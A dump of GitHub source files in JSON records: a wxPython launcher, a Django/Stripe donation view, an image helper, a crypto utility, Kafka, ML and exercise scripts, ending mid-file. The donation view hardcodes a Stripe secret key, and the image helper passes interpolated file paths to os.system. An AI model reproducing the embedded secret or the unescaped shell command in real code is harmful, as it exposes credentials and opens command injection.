'forkserver' in mp.get_all_start_methods():\n mp.set_start_method('forkserver')\n\n matplotlib.use('WXAGG')\n\n wx.UpdateUIEvent.SetMode(wx.UPDATE_UI_PROCESS_SPECIFIED)\n wx.UpdateUIEvent.SetUpdateInterval(1000)\n\n import ifigure\n from ifigure.ifigure_app import ifigure_app, MyApp\n from 
ifigure.utils.mp_tarzip import MPTarzip\n from os.path import expanduser\n\n # if it does not have write permission to current directory\n # it moves to home directory\n # make tempfile need write permission in some case?\n # (2014 10)\n if not os.access(os.getcwd(), os.W_OK):\n print('No access to current working directory, moving to home directory')\n os.chdir(expanduser('~'))\n\n import site\n home = expanduser('~')\n site.USER_SITE = os.path.join(\n home, '.ifigure_rc', '.local', 'site-packages')\n site.USER_BASE = os.path.join(home, '.ifigure_rc', '.local')\n redirect_std = True\n use_console = True\n file = None\n start_server = False\n show_file_open_error = False\n exe_command = None\n hide_main = False\n\n class MainlevelJob(object):\n def __init__(self):\n self.func = None\n self.func2 = []\n\n def setjob(self, func):\n self.func = func\n\n def dojob(self):\n if self.func is not None:\n self.func()\n self.func = None\n\n def setfinishjob(self, func):\n if not func in self.func2:\n self.func2.append(func)\n\n def finishjob(self):\n for f in self.func2:\n f()\n\n # this is a place where wdir is set when exiting\n # the program\n import __main__\n __main__.xxx = []\n launcher_file = None\n use_gl = True\n if len(sys.argv[1:]) >= 1:\n rflag = False\n lflag = False\n for p in sys.argv[1:]:\n if p == '-h':\n print('[Usage: ifigure -s -r command -h file]')\n print('ifigure : start a new project')\n print('ifigure : open an existing project')\n print('-s : start server thread')\n print('-d : suppress console redirect')\n print('-c : completely suppress redirect')\n print('-n : no main window')\n print('-p : call profiler')\n print('-r : run command')\n print('-h : show this help')\n print('-g : turn off gl')\n print('-w : warning on')\n print('-ww : warning on (error)')\n print('-l : file to commnicate with launcher ')\n sys.exit()\n elif p == '-s':\n start_server = True\n redirect_std = True\n __main__.process_server_request = False\n\n server = ifigure.server.Server()\n server.start()\n continue\n elif p == '-d':\n use_console = False\n redirect_std = False\n print('debug mode (console is suppressed. 
all redirect is off')\n continue\n elif p == '-c':\n use_console = False\n print('debug mode (console is suppressed, but thread log window is on)')\n continue\n elif p == '-n':\n hide_main = True\n continue\n elif p == '-p':\n pr = None\n import cProfile\n print('starting profiler')\n pr = cProfile.Profile()\n pr.enable()\n elif p == '-r':\n rflag = True\n elif p == '-l':\n lflag = True\n elif p == '-g':\n use_gl = False\n elif p == '-w':\n warnings.simplefilter('always')\n print('debug mode (warning is on)')\n elif p == '-ww':\n warnings.simplefilter('error')\n print('debug mode (warning cuases error)')\n else:\n if rflag:\n if len(p) > 0:\n p = p.strip()\n if p.startswith('\"'):\n exe_command = p[1:-1]\n elif p.startswith(\"'\"):\n exe_command = p[1:-1]\n else:\n exe_command = p\n if exe_command.strip() == '':\n exe_command = None\n rflag = False\n elif lflag:\n launcher_file = p.strip()\n lflag = False\n else:\n if os.path.exists(p):\n file = p\n print(('opening file : '+file))\n file = os.path.abspath(file)\n else:\n show_file_open_error = True\n filename = p\n file = None\n from ifigure.widgets.appearance_config import AppearanceConfig\n appearanceconfig = AppearanceConfig()\n\n import ifigure.widgets.canvas.ifigure_canvas\n import ifigure.matplotlib_mod.backend_wxagg_gl as wxagg_gl\n if use_gl:\n use_gl = appearanceconfig.setting['gl_use']\n if use_gl:\n ifigure.widgets.canvas.ifigure_canvas.turn_on_gl = use_gl\n wxagg_gl.use_gl_12 = appearanceconfig.setting['gl_use_12']\n wxagg_gl.load_glcanvas(debug=True)\n else:\n print('No 3D plot (OpenGL turned off)')\n\n ifigure.ifigure_app.redirect_std = redirect_std\n ifigure.ifigure_app.use_console = use_console\n# from ifigure.utils.rollback_importer import RollbackImporter as RI\n from ifigure.mto.treedict import fill_td_name_space\n\n sc = os.path.join(os.path.dirname(ifigure.__file__),\n 'mto', 'treedict_ns.py')\n if os.path.exists(sc):\n fill_td_name_space(sc)\n from ifigure.ifigure_config import rcdir\n sc = os.path.join(rcdir, 'treedict_ns.py')\n if os.path.exists(sc):\n fill_td_name_space(sc)\n\n app = MyApp(False, clearSigInt=False)\n ifig_app = app.get_ifig_app()\n\n if show_file_open_error:\n ifig_app.shell.write('### File not found : ' + filename)\n\n if file is not None:\n if file[-4:] == '.pfz':\n ifig_app.proj_tree_viewer.update_widget()\n #ifig_app.open_file(file, call_close=True)\n # ifig_app.set_proj_saved(True)\n #wx.CallAfter(ifig_app.onOpen, path =file)\n # somehow this seems work, but others may not open\n # figure windows associated to the project file\n wx.CallLater(10, ifig_app.onOpen, path=file)\n\n # ifig_app.draw_all()\n # ifig_app.set_filename_2_window_title()\n elif file[-4:] == '.bfz':\n bk = ifig_app.proj.load_subtree(file, compress=True)\n from ifigure.mto.fig_book import FigBook\n if not isinstance(bk, FigBook):\n sys.exit()\n ifig_app.ipage = 0\n bk.setvar(\"original_filename\", file)\n# bk.set_open(True)\n ifig_app.book = bk\n# obk.destroy()\n ifigure.events.SendChangedEvent(bk, w=ifig_app)\n ifigure.events.SendOpenBookEvent(bk, w=ifig_app)\n# ifig_app.show_page(ifig_app.ipage)\n else:\n wx.CallLater(3, ifig_app.onOpenWithHelperCommand,\n path=file, hide_main=hide_main)\n# ifig_app.open_book_in_appwindow(ifig_app.proj.book1, ipage=0)\n\n if start_server:\n ifig_app.use_server()\n __main__.process_server_request = True\n port = server.info()[3]\n print('remote port is open : port = ' + str(port) + '\\n')\n\n # call tempdir_clean when ifig_app is being deleted\n class TempdirObj(object):\n pass\n 
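# (editor's note) the weakref below implements the finalizer idiom: the callback fires once the referent\n    # is garbage collected. A minimal standalone sketch (illustrative names only):\n    #   import weakref\n    #   class Sentinel: pass\n    #   s = Sentinel(); r = weakref.ref(s, lambda _ref: print('cleanup')); del s  # prints 'cleanup'\n    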
ifig_app._tempdir_obj = TempdirObj()\n    from ifigure.ifigure_config import tempdir_clean\n    tempdir_ref = weakref.ref(ifig_app._tempdir_obj, tempdir_clean)\n\n    # reduce update events\n    wx.UpdateUIEvent.SetMode(wx.UPDATE_UI_PROCESS_SPECIFIED)\n\n#    if pr is not None:\n#        from ifigure.interactive import profile_stop\n#        profile_stop(pr, sortby='cumulative')\n\n    if exe_command is not None:\n        if hide_main:\n            wx.CallAfter(ifig_app.shell.execute_and_hide_main, exe_command)\n        else:\n            wx.CallAfter(ifig_app.shell.Execute, exe_command)\n    if hide_main and exe_command is None:\n        # not sure whether this is necessary; hide_main and exe_command\n        # are used together in the normal situation.\n        wx.CallAfter(ifig_app.goto_no_mainwindow)\n    # conditions for ipython\n    ifig_app.set_launcher_file(launcher_file)\n\n    from ifigure.widgets.taskbar import TaskBarIcon\n    tbicon = TaskBarIcon()\n\n    app.MainLoop()\n\n    server = ifigure.server.Server()\n    if server.info()[0]:\n        server.stop()\n\n    if not MPTarzip().isReady():\n        # seems like it is not necessary since wx.CallLater\n        # in MPTarzip makes sure that the program does not\n        # come here before save process finishes.\n\n        # anyway, just in case...\n        print('waiting for save to be done')\n        MPTarzip().worker.join()\n    #\n    # deleting the wdir used last moment...\n    #\n    wdirs = __main__.xxx\n    for wdir in wdirs:\n        if os.path.exists(wdir):\n            print(('deleting :', wdir))\n            shutil.rmtree(wdir)\n#    MDSWorkerPool(type=worker_mode).reset()\n    print('main loop finished')\n    print('following is for debug to check if normal exit')\n    import threading\n    import time\n    time.sleep(1)\n    for t in threading.enumerate():\n        print(t)\n    print((wx.GetTopLevelWindows()))\n","repo_name":"piScope/piScope","sub_path":"python/ifigure/piscope.py","file_name":"piscope.py","file_ext":"py","file_size_in_byte":10232,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"}
{"seq_id":"645413721","text":"#filename=input(\"Enter filename: \")\n#print (\"The file name is: %s\" % (filename))\n# loop that keeps running until a decimal /numeric/ value is entered\nwhile True:\n    filesizeStr=input(\"Enter the max file size (MB): \")\n    if filesizeStr.isdecimal():\n        filesizeInt=int(filesizeStr)\n        break\nprint (\"The max size is %d\" % (filesizeInt))\nprint (\"Size in KB is %d\" % (filesizeInt*1024))\n\n\n","repo_name":"daniel-majo/udemy_podstawy","sub_path":"ZebranePrace/75_dane_użytkownika.py","file_name":"75_dane_użytkownika.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"71804341682","text":"import datetime\n\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom .models import Donate\nfrom home.models import Profile\nfrom django.http import HttpResponseRedirect\nfrom rest_framework.status import HTTP_200_OK\nfrom .serializers import DonateSerializer\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\n\nimport stripe\n\nstripe.api_key = \"sk_test_51Jtlh9EiJAngkF1R6wywckuD1gOYyieoOBqg4EaP2STpe8GYoMp0iDTNpjBF1PeCUxbMkGQaxt8djtqOmjxfuTzG00yk4bAExN\"\n\n\ndef index(request):\n    if request.user.is_authenticated:\n        today = datetime.datetime.now()\n        data = {'Profile': Profile.objects.get(user_ID=request.user.id),\n                'Donations': Donate.objects.filter(date_donated__year=today.year, date_donated__month=today.month)\n                }\n        return 
render(request, 'donate/donate.html', data)\n else:\n return redirect('/login/')\n\n\ndef charge(request):\n if request.method == 'POST':\n print('Data:', request.POST)\n\n amount = int(request.POST['amount'])\n\n customer = stripe.Customer.create(\n email=request.POST['email'],\n name=request.user.username,\n source=request.POST['stripeToken']\n )\n\n charge = stripe.Charge.create(\n customer=customer,\n amount=amount * 100,\n currency='usd',\n description=\"Donation\"\n )\n user = User.objects.get(id=request.user.id)\n donation = Donate(amount=amount, user_ID=user)\n donation.save()\n\n return redirect(reverse('success', args=[amount]))\n\n\ndef successMsg(request, args):\n amount = args\n data = {\n 'Profile': Profile.objects.get(user_ID=request.user.id),\n 'amount': amount\n }\n return render(request, 'donate/success.html', data)\n\n\n# Donate API\nclass DonateAPI(APIView):\n def get(self, request, *arg, **kwargs):\n ObjDonate = Donate.objects.all()\n serializer = DonateSerializer(ObjDonate, many=True)\n return Response(serializer.data, status=HTTP_200_OK)\n\n def post(self, request, *args, **kwargs):\n serializer = DonateSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors)\n","repo_name":"thngph/zooTPJ","sub_path":"donate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1682072474","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('alumni', '0013_auto_20150718_1010'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='beroep',\n name='persoon',\n field=models.ForeignKey(default=1, to='alumni.Persoon'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='contact',\n name='contacttype',\n field=models.CharField(default='gsm', max_length=10, choices=[('twitter', 'Twitter'), ('linkedin', 'LinkedIn'), ('telefoon', 'Telefoon'), ('gsm', 'GSM'), ('website', 'Website')]),\n ),\n migrations.AlterField(\n model_name='persoon',\n name='geslacht',\n field=models.CharField(default='M', max_length=1, choices=[('V', 'vrouw'), ('?', 'onbekend'), ('M', 'man'), ('A', 'ander')]),\n ),\n ]\n","repo_name":"mvuijlst/alumni","sub_path":"repertorium/alumni/migrations/0014_auto_20150718_1251.py","file_name":"0014_auto_20150718_1251.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15162087419","text":"import os\nimport requests\nimport datetime\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Image:\n\n BaseDir = r\".\\Resources\\Images\"\n\n\n @staticmethod\n def GetFromUrl(url:str, name:str):\n \"\"\"Get an image from the given url, save it to the given name, and return the directory of the image\"\"\"\n\n directory = os.path.join(Image.BaseDir, name)\n\n if os.path.isfile(directory):\n # change the directory name to a unique one\n \n # split the name to name and extension\n name, extension = os.path.splitext(name)\n \n # create a new name\n name = name + \"_\" + datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") + extension\n \n directory = os.path.join(Image.BaseDir, name)\n\n try:\n # Get the image from the url\n response = requests.get(url)\n\n if response.status_code == 200:\n \n with open(directory, 
\"wb\") as f:\n f.write(response.content)\n \n return directory\n \n else:\n return None\n\n except Exception as e:\n return None\n\n\n @staticmethod\n def GetFromDirectory(path: str):\n \"\"\"Copy the image form the directory in the image resources and return the new directory\"\"\"\n\n if os.path.dirname(path) == Image.BaseDir:\n if os.path.isfile(path):\n return path\n\n if os.path.isfile(path):\n \n # copy the image to BaseDir\n \n name = os.path.basename(path)\n destination = os.path.join(Image.BaseDir, name)\n\n if os.path.isfile(destination):\n \n # check if two images has the same content\n with open(path, \"rb\") as f:\n if f.read() == open(destination, \"rb\").read():\n return destination\n\n # change the destination name to a unique one\n # split the name to name and extension\n name, extension = os.path.splitext(name)\n\n # create a new name\n name = name + \"_\" + datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") + extension\n\n destination = os.path.join(Image.BaseDir, name)\n\n os.system(f\"copy \\\"{os.path.abspath(path)}\\\" \\\"{os.path.abspath(destination)}\\\"\")\n\n return destination\n\n else:\n return None\n\n\n @staticmethod\n def Browse(window : QtWidgets.QMainWindow):\n \"\"\"opens a browse dialog and returns selected path\"\"\"\n\n return QtWidgets.QFileDialog.getOpenFileName(window, \"Open File\", \".\\\\\", \"Image Files (*.png *.jpg *.bmp *.gif)\")[0]\n\n\n @staticmethod\n def DefaultUserImagePath():\n return os.path.join(Image.BaseDir, \"user_default.png\")\n\n @staticmethod\n def DefaultFoodImagePath():\n return os.path.join(Image.BaseDir, \"food_default.png\")","repo_name":"Mohsen-Rahimi8001/AP4002_Group2","sub_path":"Lib/Image.py","file_name":"Image.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"30884080173","text":"from cryptography.fernet import Fernet\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\nfrom Crypto import Random\nfrom base64 import b64encode, b64decode, urlsafe_b64encode\nimport os\n\n\"\"\"\nThis module basically exists to provide some security for when RouteWatch supports external DBs, allowing the secure\nstorage of access credentials in an \"untrusted\" location.\nAt the time of writing the cryptography library used defaults to AES-CBC-128 with HMAC-SHA256 authentication and is\nwidely believed to be a cryptographically secure implementation.\n\"\"\"\n\n\ndef get_secret():\n \"\"\"\n Finds or creates a new secret for use with the encrypt and decrypt functions.\n :return:\n :rtype: bytes\n \"\"\"\n with open(\"master.key\", \"ba+\") as f:\n # Checks the size of the secret and loads it if it's valid\n if os.path.getsize(\"master.key\") != 32: # If it's not the correct length it generates a new one and stores it.\n f.seek(0)\n r = Random.new()\n secret = r.read(32)\n f.write(secret)\n else:\n f.seek(0)\n secret = f.read(32)\n return secret\n\n\ndef encrypt(data, secret):\n \"\"\"\n Basically wraps the cryptography lib to reduce code duplication\n :param data:\n :type data: bytes\n :param secret:\n :type secret: bytes\n :return:\n :rtype: bytes, str\n \"\"\"\n # Generate a cryptographically secure salt\n r = Random.new()\n salt = r.read(16)\n # Generates a suitable key from the secret by HMACing it with the salt\n kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=100000, 
backend=default_backend())\n key = urlsafe_b64encode(kdf.derive(secret))\n # Encrypts the data\n f = Fernet(key)\n ciphertext = f.encrypt(data)\n return b64encode(salt + ciphertext)\n\n\ndef decrypt(encodedciphertext, secret):\n \"\"\"\n Basically wraps the cryptography lib to reduce code duplication\n :param encodedciphertext:\n :type encodedciphertext: bytes\n :param secret:\n :type secret: bytes\n :return:\n \"\"\"\n # Split out the salt from the ciphertext\n ciphertext = b64decode(encodedciphertext)\n salt = ciphertext[:16]\n ciphertext = ciphertext[16:]\n # Regenerates the key by HMACing the secret with the salt\n kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=100000, backend=default_backend())\n key = urlsafe_b64encode(kdf.derive(secret))\n # Decrypts the data\n f = Fernet(key)\n data = f.decrypt(ciphertext)\n return data\n","repo_name":"nerdalize/routewatch","sub_path":"routewatch/Security/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"34977660304","text":"class ProfanityFilter:\n\n def __init__(self, keywords, template):\n self.__keywords = sorted(keywords, key=len, reverse=True)\n self.__template = template\n\n def __clear__(self, message):\n lowercase_input = message.lower()\n for bad_word in self.__keywords:\n if lowercase_input.__contains__(bad_word):\n if len(bad_word) >= 3:\n profanity = (len(bad_word) // 3) * self.__template\n if not len(bad_word) % 3 == 0:\n profanity += self.__template[: (len(bad_word) % 3)]\n message = message.lower().replace(bad_word, profanity)\n else:\n message = message.lower().replace(bad_word, self.__template[: (len(bad_word) % 3)])\n return message\n\n def filter(self, msg):\n cleared_msg = ProfanityFilter.__clear__(self, msg)\n copy = \"\"\n for i, v in enumerate(msg.split(\" \")):\n if v.lower() in cleared_msg:\n copy += v + \" \"\n else:\n copy += cleared_msg.split(\" \")[i] + \" \"\n return copy[:-1]\n\n\n# You can play around with your implementation in the body of the following 'if'.\n# The contained statements will be ignored while evaluating your solution.\nif __name__ == '__main__':\n f = ProfanityFilter([\"duck\", \"shot\", \"batch\", \"mastard\", \"z\"], \"?#$\")\n offensive_msg = \"Abc defghi Mastard mastard jklmno mastard Z\"\n clean_msg = f.filter(offensive_msg)\n print(clean_msg) # abc defghi ?#$?#$? 
jklmno\n","repo_name":"LiamK21/UZH-Inf-Exercises-1","sub_path":"Exercises INF 1/Exercise 8/Exercise8Task1.py","file_name":"Exercise8Task1.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"29447289371","text":"import torch\nfrom torchvision import models\n\nfrom lighter.decorator import config\nfrom lighter.model import BaseModule\n\n\nclass InceptionNetFeatureExtractionModel(BaseModule):\n    @config(path='models/inception.config.json', property='model')\n    def __init__(self):\n        super(InceptionNetFeatureExtractionModel, self).__init__()\n        self.inception = models.inception_v3(pretrained=self.config.model.pretrained,\n                                             aux_logits=self.config.model.aux_logits).to(self.device)\n        for param in self.inception.parameters():\n            param.requires_grad = not self.config.model.freeze_pretrained\n        self.hidden = torch.nn.Linear(self.inception.fc.out_features,\n                                      self.config.model.hidden_units).to(self.device)\n        self.final = torch.nn.Linear(self.config.model.hidden_units,\n                                     self.config.model.output).to(self.device)\n\n    def forward(self, x):\n        h = self.inception(x)\n        h = torch.relu(h)\n        h = self.hidden(h)\n        h = torch.relu(h)\n        h = self.final(h)\n        return torch.sigmoid(h)\n","repo_name":"Xpitfire/lighter","sub_path":"examples/coco_looking/models/inception.py","file_name":"inception.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"}
{"seq_id":"10574927333","text":"#!/bin/python3\n# source : https://www.hackerrank.com/challenges/encryption/problem\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the encryption function below.\ndef encryption(s):\n    l = len(s)\n    row = math.floor(math.sqrt(l))\n    col = math.ceil(math.sqrt(l))\n\n    if row * col < l:\n        row+=1\n    \n    #print(row)\n    #print(col)\n    \n    result=[]\n    for i in range(col):\n        for j in range(row):\n            try:\n                #print(i,j)\n                result.append(s[i+ (j*col) ])\n            except:\n                result.append(' ')\n        \n        result.append(' ')\n    \n    tmp_string = ''.join(result)\n    tmp_string = re.sub(' +', ' ', tmp_string)\n\n    return tmp_string\n\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    s = input()\n\n    result = encryption(s)\n\n    fptr.write(result + '\\n')\n\n    fptr.close()\n","repo_name":"Bruck1701/CodingInterview","sub_path":"generalAlgorithms/hackerRank/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"2462726536","text":"number = int(input())\ncurrent = 0\nflag = True\nfor row in range(1, number + 1):\n    for amount_of_numbers_to_print in range(1, row + 1):\n        current += 1\n        print(current, end=\" \")\n        if current == number:\n            flag = False\n            break\n    if not flag:\n        break\n    print()","repo_name":"Nikikapralov/Python","sub_path":"SoftUni/Python Basics/6-Nested loops/Exercises/01-Numbers_Pyramid.py","file_name":"01-Numbers_Pyramid.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"}
{"seq_id":"30851361699","text":"'''Create a program that simulates the operation of an ATM. \nAt the start, ask the user for the amount to be withdrawn (an integer), and the program will report \nhow many bills of each denomination will be dispensed.\nNOTE: assume the ATM has bills of R$50, R$20, R$10 and R$1.'''\nvalor = int(input('Valor a sacar: '))\n\nlista = [50, 20, 10, 1]\nfor c in lista:\n    # integer-divide to get the number of bills of this denomination,\n    # then keep the remainder for the smaller denominations\n    qtd = valor // c\n    valor -= qtd * c\n    print(f'Notas de R${c}: {qtd}')\n","repo_name":"digas06/Aprendizado_Python","sub_path":"Modulo02/Etruturas_de_controle/71.py","file_name":"71.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"19628913112","text":"#kafka stream user\r\nfrom confluent_kafka import Producer\r\nimport requests\r\nimport json\r\nimport time \r\n\r\n# define url source and request data\r\nurl = 'https://dummyjson.com/users'\r\nresponse = requests.get(url)\r\n\r\n# read and parse the data using json()\r\nusers = response.json()\r\n \r\n# define the producer by specifying the port of the Kafka cluster\r\np = Producer({'bootstrap.servers':'localhost:9092'})\r\nprint('Kafka Producer Started...')\r\n\r\n# Define a callback function for errors.\r\n# A valid message will be decoded to utf-8 and printed to the console.\r\ndef receipt(err,msg):\r\n    if err is not None:\r\n        print('Error: {}'.format(err))\r\n    else:\r\n        message = 'Produced message on topic {} with value of {}\\n'.format(msg.topic(), msg.value().decode('utf-8'))\r\n        print(message)\r\n\r\n# Define topic name here\r\ntopic_name = 'users'\r\n\r\ndef main():\r\n    for user in users['users']: # the json response contains a key named 'users'\r\n        p.produce(topic_name, json.dumps(user).encode('utf-8'), callback=receipt) # json.dumps(): convert dict to json file\r\n        p.poll(1)\r\n        p.flush()\r\n        time.sleep(2) # suspends execution for 2 sec.\r\n\r\nif __name__ == '__main__':\r\n    main()","repo_name":"miftus/task8","sub_path":"producer_users.py","file_name":"producer_users.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"22257277074","text":"#\tCatalan Numbers\n#https://open.kattis.com/problems/catalan\n\nd= {0: 1, 1: 1}\ndef catalan(n):\n    if d.__contains__(n):\n        return d[n]\n    if n <= 500:\n        d[n] = ((n << 2) - 2) * catalan(n-1) // (n + 1)\n    else:\n        catalan(n-500)\n        d[n] = ((n << 2) - 2) * catalan(n-1) // (n + 1)\n    return d[n]\nn=int(input())\nfor i in range(0, n):\n    p=int(input())\n    print(catalan(p))\n","repo_name":"sai034/KattisSolutions","sub_path":"catalanNumbers.py","file_name":"catalanNumbers.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"18775195810","text":"def find_subarr(input_lst, num):\n    dict = {}\n    sum = 0\n    for idx, val in enumerate(input_lst):\n        sum +=val\n        if sum - num in dict:\n            return (dict[sum-num],idx)\n        elif val == num:\n            return (idx,idx)\n        else:\n            dict[sum - val] = idx\n    return 
()\n","repo_name":"PavelBezzub/Applied-Python-2019","sub_path":"homework1/hw1_subarr.py","file_name":"hw1_subarr.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"33526160580","text":"import numpy as np\r\n\r\n\r\ndef calc_optimal_chi(kmm, gammastar, ns_star, ca, vpd, beta):\r\n    # -----------------------------------------------------------------------\r\n    # Input:    - float, 'kmm' : Pa, Michaelis-Menten coeff.\r\n    #           - float, 'ns_star' : (unitless) viscosity correction factor for water\r\n    #           - float, 'vpd' : Pa, vapor pressure deficit\r\n    # Output:   float, ratio of ci/ca (chi)\r\n    # Features: Returns an estimate of leaf internal to ambient CO2\r\n    #           partial pressure following the \"simple formulation\".\r\n    # Depends:  - kc\r\n    #           - ns\r\n    #           - vpd\r\n    # -----------------------------------------------------------------------\r\n\r\n    # leaf-internal-to-ambient CO2 partial pressure (ci/ca) ratio\r\n    xi = np.sqrt((beta * (kmm + gammastar)) / (1.6 * ns_star))\r\n    chi = gammastar / ca + (1.0 - gammastar / ca) * xi / (xi + np.sqrt(vpd))\r\n\r\n    # Define variable substitutes:\r\n    vdcg = ca - gammastar\r\n    vacg = ca + 2.0 * gammastar\r\n    vbkg = beta * (kmm + gammastar)\r\n\r\n    # wrap if condition in a function to allow vectorization\r\n\r\n    def calc_mj(ns_star, vpd, vbkg):\r\n        vsr = np.sqrt(1.6 * ns_star * vpd / vbkg)\r\n        # Based on the mc' formulation (see Regressing_LUE.pdf)\r\n        mj = vdcg / (vacg + 3.0 * gammastar * vsr)\r\n        return mj\r\n\r\n    # Check for negatives, vectorized\r\n    if ns_star > 0 and vpd > 0 and vbkg > 0:\r\n        mj = calc_mj(ns_star, vpd, vbkg)\r\n    elif isinstance(vpd, float):\r\n        mj = np.NaN\r\n    else:\r\n        mj = np.zeros(len(vpd))\r\n\r\n    # alternative variables\r\n    gamma = gammastar / ca\r\n    kappa = kmm / ca\r\n\r\n    # mc\r\n    mc = (chi - gamma) / (chi + kappa)\r\n\r\n    # mj:mv\r\n    mjoc = (chi + kappa) / (chi + 2 * gamma)\r\n\r\n    out = {'chi': chi, 'mc': mc, 'mj': mj, 'mjoc': mjoc}\r\n    return out\r\n\r\n\r\ndef calc_lue_vcmax_wang17(out_optchi, kphio, ftemp_kphio, c_molmass, soilmstress):\r\n\r\n    # Include effect of Jmax limitation\r\n    if isinstance(out_optchi['chi'], float):\r\n        leng = 1\r\n    else:\r\n        leng = len(out_optchi['chi'])\r\n    mprime = calc_mprime(out_optchi['mj'])\r\n\r\n    out = {\r\n        # Light use efficiency (gpp per unit absorbed light)\r\n        'lue': kphio * ftemp_kphio * mprime * c_molmass * soilmstress,\r\n\r\n        # Vcmax normalised per unit absorbed PPFD (assuming iabs=1), with Jmax limitation\r\n        'vcmax_unitiabs': kphio * ftemp_kphio * out_optchi['mjoc'] * mprime / out_optchi['mj'] * soilmstress,\r\n\r\n        # complement for non-smith19\r\n        'omega': np.full(leng, np.NaN),\r\n        'omega_star': np.full(leng, np.NaN)\r\n    }\r\n    return out\r\n\r\n\r\ndef calc_lue_vcmax_smith19(out_optchi, kphio, ftemp_kphio, c_molmass, soilmstress):\r\n\r\n    if isinstance(out_optchi['chi'], float):\r\n        leng = 1\r\n    else:\r\n        leng = len(out_optchi['chi'])\r\n\r\n    # Adapted from Nick Smith's code:\r\n    # Calculate omega, see Smith et al., 2019 Ecology Letters\r\n    def calc_omega(theta, c_cost, m):\r\n\r\n        cm = 4 * c_cost / m # simplification term for omega calculation\r\n        v = 1 / (cm * (1 - theta * cm)) - 4 * theta # simplification term for omega calculation\r\n\r\n        # account for non-linearities at low m values\r\n        capP = (((1 / 1.4) - 0.7) **2 / (1 - theta)) + 3.4\r\n        aquad = -1\r\n        bquad = capP\r\n        cquad = -(capP * theta)\r\n        m_star = (4 * c_cost) / np.polynomial.polynomial.polyroots([aquad, bquad, cquad])\r\n\r\n        if m < np.real(m_star[0]):\r\n            omega = -(1 - (2 * theta)) - np.sqrt((1 - theta) * v)\r\n        else:\r\n            omega = -(1 - (2 * theta)) + np.sqrt((1 - theta) * v)\r\n        return (omega)\r\n\r\n    # constants\r\n    theta = 0.85 # should be calibratable?\r\n    c_cost = 0.05336251\r\n\r\n    # factors derived as in Smith et al., 2019\r\n    omega = calc_omega(theta=theta, c_cost=c_cost, m=out_optchi['mc'] ) # Eq. S4\r\n    omega_star = 1.0 + omega - np.sqrt((1.0 + omega)**2 - (4.0 * theta * omega)) # Eq. 18\r\n\r\n    # Effect of Jmax limitation\r\n    mprime = out_optchi['mj'] * omega_star / (8.0 * theta)\r\n\r\n    # Light use efficiency (gpp per unit absorbed light)\r\n    lue = kphio * ftemp_kphio * mprime * c_molmass * soilmstress\r\n\r\n    # calculate Vcmax per unit absorbed light\r\n    vcmax_unitiabs = kphio * ftemp_kphio * out_optchi['mjoc'] * omega_star / (8.0 * theta) * soilmstress # Eq. 19\r\n\r\n    out = {\r\n        'lue': lue,\r\n        'vcmax_unitiabs': vcmax_unitiabs,\r\n        'omega': omega,\r\n        'omega_star': omega_star\r\n    }\r\n    return out\r\n\r\n\r\ndef calc_lue_vcmax_none(out_optchi, kphio, ftemp_kphio, c_molmass, soilmstress):\r\n    # Do not include effect of Jmax limitation\r\n    if isinstance(out_optchi['chi'], float):\r\n        leng = 1\r\n    else:\r\n        leng = len(out_optchi['chi'])\r\n\r\n    out = {\r\n        # Light use efficiency (gpp per unit absorbed light)\r\n        'lue': kphio * ftemp_kphio * out_optchi['mj'] * c_molmass * soilmstress,\r\n\r\n        # Vcmax normalised per unit absorbed PPFD (assuming 